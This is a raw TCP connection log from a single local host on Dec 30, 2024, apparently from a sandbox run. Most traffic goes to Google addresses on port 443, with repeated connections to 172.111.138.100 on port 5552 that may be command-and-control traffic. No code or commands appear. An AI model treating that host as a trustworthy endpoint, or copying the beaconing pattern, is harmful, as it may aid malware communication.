                                                                                                                                                      Dec 30, 2024 11:25:30.006870985 CET44349776172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.007654905 CET49775443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:30.007671118 CET44349775172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.032103062 CET49777443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:30.032120943 CET44349777142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.032269955 CET49777443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:30.033787012 CET49777443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:30.033798933 CET44349777142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.043194056 CET49778443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:30.043239117 CET44349778142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.043342113 CET49778443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:30.044189930 CET49778443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:30.044210911 CET44349778142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.160239935 CET804976969.42.215.252192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.160355091 CET4976980192.168.2.1169.42.215.252
                                                                                                                                                      Dec 30, 2024 11:25:30.605205059 CET44349775172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.605360031 CET49775443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:30.606126070 CET49775443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:30.606132030 CET44349775172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.609328985 CET49775443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:30.609333992 CET44349775172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.614367008 CET44349776172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.614434004 CET49776443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:30.614763975 CET49776443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:30.614772081 CET44349776172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.618088961 CET49776443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:30.618098021 CET44349776172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.638736010 CET44349777142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.638825893 CET49777443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:30.643801928 CET49777443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:30.643831968 CET44349777142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.644140959 CET44349777142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.644207954 CET49777443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:30.644866943 CET49777443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:30.664343119 CET44349778142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.664418936 CET49778443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:30.668152094 CET49778443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:30.668163061 CET44349778142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.668399096 CET44349778142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.668447971 CET49778443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:30.669073105 CET49778443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:30.691334009 CET44349777142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.711335897 CET44349778142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.983408928 CET44349775172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.983479023 CET44349775172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.983520031 CET49775443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:30.983520031 CET49775443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:30.984112024 CET49775443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:30.984129906 CET44349775172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.984142065 CET49775443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:30.984199047 CET49775443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:30.985501051 CET49787443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:30.985557079 CET44349787172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.985622883 CET49787443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:30.986000061 CET49787443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:30.986027956 CET44349787172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.991578102 CET44349776172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.991637945 CET49776443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:30.992192984 CET49776443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:30.992229939 CET44349776172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.992290974 CET49776443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:30.993536949 CET49788443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:30.993566990 CET44349788172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.993639946 CET49788443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:30.994389057 CET49788443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:30.994399071 CET44349788172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.046545029 CET44349777142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.046592951 CET44349777142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.046602964 CET49777443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:31.046634912 CET44349777142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.046643972 CET49777443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:31.046686888 CET49777443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:31.046694040 CET44349777142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.046715975 CET44349777142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.046736956 CET49777443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:31.046760082 CET49777443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:31.057462931 CET49777443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:31.057483912 CET44349777142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.058160067 CET49789443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:31.058199883 CET44349789142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.058289051 CET49789443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:31.058702946 CET49789443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:31.058715105 CET44349789142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.197166920 CET44349778142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.197212934 CET44349778142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.197324991 CET44349778142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.198760986 CET49778443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:31.198760986 CET49778443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:31.199351072 CET49790443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:31.199407101 CET44349790142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.199744940 CET49790443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:31.200118065 CET49790443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:31.200145960 CET44349790142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.520942926 CET49778443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:31.520958900 CET44349778142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.573826075 CET497975552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:25:31.579776049 CET555249797172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.579927921 CET497975552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:25:31.580436945 CET497975552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:25:31.581077099 CET44349787172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.581238031 CET49787443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:31.581809998 CET44349787172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.582159042 CET49787443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:31.586019993 CET555249797172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.587569952 CET49787443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:31.587582111 CET44349787172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.587965965 CET44349787172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.588382959 CET49787443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:31.588658094 CET49787443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:31.610165119 CET44349788172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.610552073 CET49788443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:31.610934019 CET44349788172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.611185074 CET49788443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:31.615951061 CET49788443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:31.615957975 CET44349788172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.616195917 CET44349788172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.616480112 CET49788443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:31.617183924 CET49788443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:31.631331921 CET44349787172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.663325071 CET44349788172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.665708065 CET44349789142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.665817976 CET49789443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:31.666395903 CET49789443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:31.666400909 CET44349789142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.666660070 CET49789443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:31.666665077 CET44349789142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.798723936 CET44349790142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.798867941 CET49790443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:31.799631119 CET49790443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:31.799631119 CET49790443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:31.799638987 CET44349790142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.799649954 CET44349790142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.958189011 CET44349787172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.958277941 CET49787443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:31.958709002 CET49787443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:31.958760023 CET44349787172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.958921909 CET44349787172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.959069967 CET49787443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:31.960114002 CET49799443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:31.960166931 CET44349799172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:31.963737965 CET49799443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:31.963936090 CET49799443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:31.963957071 CET44349799172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.067958117 CET44349789142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.068006992 CET44349789142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.068046093 CET49789443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:32.068058968 CET44349789142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.068145037 CET44349789142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.068170071 CET49789443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:32.068557024 CET49789443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:32.070122004 CET44349788172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.070735931 CET44349788172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.070780993 CET49789443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:32.070792913 CET44349789142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.070828915 CET49788443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:32.071010113 CET49801443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:32.071059942 CET44349801142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.071461916 CET49801443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:32.071742058 CET49801443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:32.071749926 CET49788443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:32.071755886 CET44349788172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.071759939 CET44349801142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.072218895 CET49802443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:32.072235107 CET44349802172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.072331905 CET49802443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:32.072818041 CET49802443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:32.072833061 CET44349802172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.224570990 CET44349790142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.224618912 CET44349790142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.224694014 CET49790443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:32.224705935 CET44349790142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.226736069 CET49790443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:32.261099100 CET49790443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:32.261122942 CET44349790142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.261693954 CET49807443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:32.261723995 CET44349807142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.261848927 CET49807443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:32.262306929 CET49807443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:32.262317896 CET44349807142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.624001980 CET44349799172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.624083996 CET49799443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:32.672266006 CET44349802172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.672344923 CET49802443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:32.675235987 CET44349801142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.675360918 CET49801443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:32.740890980 CET49799443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:32.740919113 CET44349799172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.749093056 CET49802443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:32.749116898 CET44349802172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.749231100 CET49799443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:32.749259949 CET44349799172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.749622107 CET49801443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:32.749628067 CET44349801142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.751251936 CET49801443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:32.751257896 CET44349801142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.753273964 CET49802443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:32.753278971 CET44349802172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.858232021 CET44349807142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.858314037 CET49807443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:32.863358021 CET49807443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:32.863368988 CET44349807142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:32.863557100 CET49807443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:32.863562107 CET44349807142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.036469936 CET44349799172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.036583900 CET49799443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:33.036776066 CET49799443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:33.036817074 CET44349799172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.036952019 CET49799443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:33.037666082 CET49817443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:33.037703037 CET44349817172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.037830114 CET49817443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:33.038098097 CET49817443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:33.038114071 CET44349817172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.052294970 CET44349802172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.052361012 CET49802443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:33.052987099 CET44349802172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.053028107 CET49802443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:33.053033113 CET44349802172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.053081036 CET49802443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:33.053172112 CET49802443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:33.053191900 CET44349802172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.053210020 CET49802443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:33.053253889 CET49802443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:33.054526091 CET49818443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:33.054562092 CET44349818172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.054991007 CET49818443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:33.054991007 CET49818443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:33.055041075 CET44349818172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.075699091 CET44349801142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.075773001 CET44349801142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.075777054 CET49801443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:33.075797081 CET44349801142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.075829029 CET49801443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:33.075861931 CET49801443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:33.075867891 CET44349801142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.075902939 CET49801443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:33.075959921 CET44349801142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.075994968 CET49801443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:33.075999975 CET44349801142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.076266050 CET49801443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:33.079277039 CET49801443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:33.079289913 CET44349801142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.080355883 CET49819443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:33.080404043 CET44349819142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.080528021 CET49819443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:33.081267118 CET49819443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:33.081301928 CET44349819142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.386796951 CET44349807142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.386848927 CET44349807142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.386904001 CET49807443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:33.386904001 CET49807443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:33.386914015 CET44349807142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.386974096 CET44349807142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.386987925 CET49807443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:33.387084961 CET49807443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:33.388237953 CET49807443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:33.388252974 CET44349807142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.388964891 CET49820443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:33.389004946 CET44349820142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.389089108 CET49820443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:33.389318943 CET49820443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:33.389328957 CET44349820142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.431548119 CET49817443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:33.431596994 CET49818443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:33.431664944 CET49819443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:33.431665897 CET49820443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:33.721450090 CET555249797172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.721645117 CET497975552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:25:33.732734919 CET497975552192.168.2.11172.111.138.100
                                                                                                                                                      Dec 30, 2024 11:25:33.737503052 CET555249797172.111.138.100192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.745867968 CET49825443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:33.745903969 CET44349825172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.745970964 CET49825443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:33.746465921 CET49826443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:33.746503115 CET44349826172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.746568918 CET49826443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:33.747070074 CET49825443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:33.747081041 CET44349825172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:33.747438908 CET49826443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:33.747446060 CET44349826172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:34.347201109 CET44349826172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:34.347353935 CET49826443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:34.347662926 CET44349825172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:34.347961903 CET44349826172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:34.347996950 CET49825443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:34.348180056 CET49826443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:34.348479033 CET44349825172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:34.348664999 CET49825443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:34.360640049 CET49826443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:34.360656977 CET44349826172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:34.360882998 CET44349826172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:34.361691952 CET49825443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:34.361702919 CET44349825172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:34.361730099 CET49826443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:34.361987114 CET44349825172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:34.362319946 CET49825443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:34.362504005 CET49826443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:34.362504959 CET49825443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:34.403325081 CET44349825172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:34.407327890 CET44349826172.217.18.110192.168.2.11
